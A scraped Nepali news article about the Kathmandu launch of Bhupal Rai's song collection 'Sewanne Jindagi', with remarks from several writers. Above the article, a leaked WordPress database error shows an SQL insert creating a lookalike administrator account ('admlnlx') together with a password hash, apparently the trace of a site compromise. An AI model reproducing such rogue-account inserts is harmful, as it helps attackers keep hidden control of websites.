WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1q35RAEdg1QOrMcae36SwZbCVzvHf1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 10:28:51', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, ११ भाद्र, काठमाण्डौ । कवि तथा गीतकार भूपाल राईले नयाँ कृति ‘सेवान्ने जीन्दगी’ लिएर पाठकमाझ आएका छन् । लामो समयदेखि गीत–कवितामा कविता चलाउँदै आएका राईको कृतिलाई राजधानीमा आयोजित एक समारोहमा कवि तथा चिन्तक हाङयुग अज्ञात, लेखक एवं स्तम्भकार उज्वल प्रसाईं, अनुसन्धाता कैलाश राई र कृतिकार भूपाल राईले संयुक्त रुपमा कृतिको बिमोचन गरेका थिए ।
कार्यक्रममा बोल्दै हाङयुग अज्ञातले कवि भूपाल राईका बिचारहरु सुनेर आफू र सिर्जनशील अराजकता आन्दोलन दिक्षित भएको बताए । ‘उहाँको बिचारहरु सुनेर म दिक्षित भएको हुँँ, हाम्रो आन्दोलन दिक्षित भएको हो’ उनले भने ‘नेपाली गीत र कवितामा भूपाल राईले निर्माण गर्नुभएको बिचार र संरचनाको शक्तिशाली बनोट कसैसँग पनि मिल्दैन ।’
कार्यक्रममा उज्वल प्रसाईंले आमा मानिसले राज्यप्रति अपनत्वको बोध खुम्चिन थालेको र यस्तो समयमा भूपाल राईका गीत र कविताहरु सुन्न आवश्यक रहेको बताए । ‘राष्ट्रवादको स्वर ठूलो बन्दै गइरहेको छ । यस्तोबेला भूपाल राईलाई बढिभन्दा बढि सुन्न आवश्यक छ’ प्रसाईंले भने ‘गैर जनजाति समुदायका मानिसहरुलाई दिमागमा ब्राह्मण्वाद राखेर हुर्काइन्छन् । त्यो अमानवीय छ । आफूलाई मानवीकीकरण गर्नका लागि भूपाल राईलाई पढ्नुपर्छ ।’
त्यसैगरी कैलाश राईले भूपाल राईजस्ता लेखकहरुको लेखनको महत्वलाई आउँदो पुस्ताले अझ प्रमाणित गर्दै जाने बताइन् । ‘किराती समुदायको धरताल बुझ्ने र बुझाउने पुस्तामध्यमा भूपाल राईहरु पर्नुहुन्छ । उहाँको वाक्यहरु सामान्यजस्ता लागे पनि गीतका अन्तर्यहरुलाई गम्भीर भएर खोतल्दा नेपाली समाजमा हामी कहाँ छौं भन्ने कुरा छर्लङ्गै हुन्छ’, राईले भनिन् ।
कार्यक्रममा कवि तथा आख्यानकार राजन मुकारुङले गीति लेखनको इतिहासमा भूपाल राईहरुलाई छुटाइएकोप्रति खेद प्रकट गर्दै आफ्नो इतिहास अरुले नलेखिदिने जिकिर गरे । ‘जसले नेपाली गीत, साहित्य र कला–संस्कृतिको लागि भिन्न धारा र प्रवाहबाट नेपाली समाजलाई कम्तिमा सम्बोधन गरौं र हाम्रा गीतमार्फत भनौं भनिरहेका छन्, उनीहरुको इतिहास कस्ले लेख्नेरहेछ त ?’ राजनले प्रश्न गर्दै भने, ‘हामी आफैँले हाम्रो इतिहास निर्माण र लेख्नुपर्नेरहेछ ।’
कार्यक्रममा गीतकार भूपाल राईले आफूले लामो समयपश्चात गीति संग्रह तयार गरेको भन्दै आफ्नो अस्वस्थताको बाबजुद कृति तयार भएको बताए । ‘लेखनको मुद्दा मिल्यो भने कसैलाई दुरुत्साहित गर्ने किरातीको संस्कृति नै होइन’ राईले भने ‘पहिचानको मुद्दालाई लिएर एक्लो अघि बढिरहेको बेला सिर्जनशील अराजकताजस्तो आन्दोलनले आँधीबेहरी निर्माण गर्नु आफैँमा गर्वको कुरा हो ।’ पुस्तकको प्रकाशन एम सिक्स सोसाइटी, हङकङले गरेको हो भने कार्यक्रमको आयोजना चिन्डो बुक्सले गरेको हो ।
https://gaulenews.com/?p=47587
https://gaulenews.com/?p=46738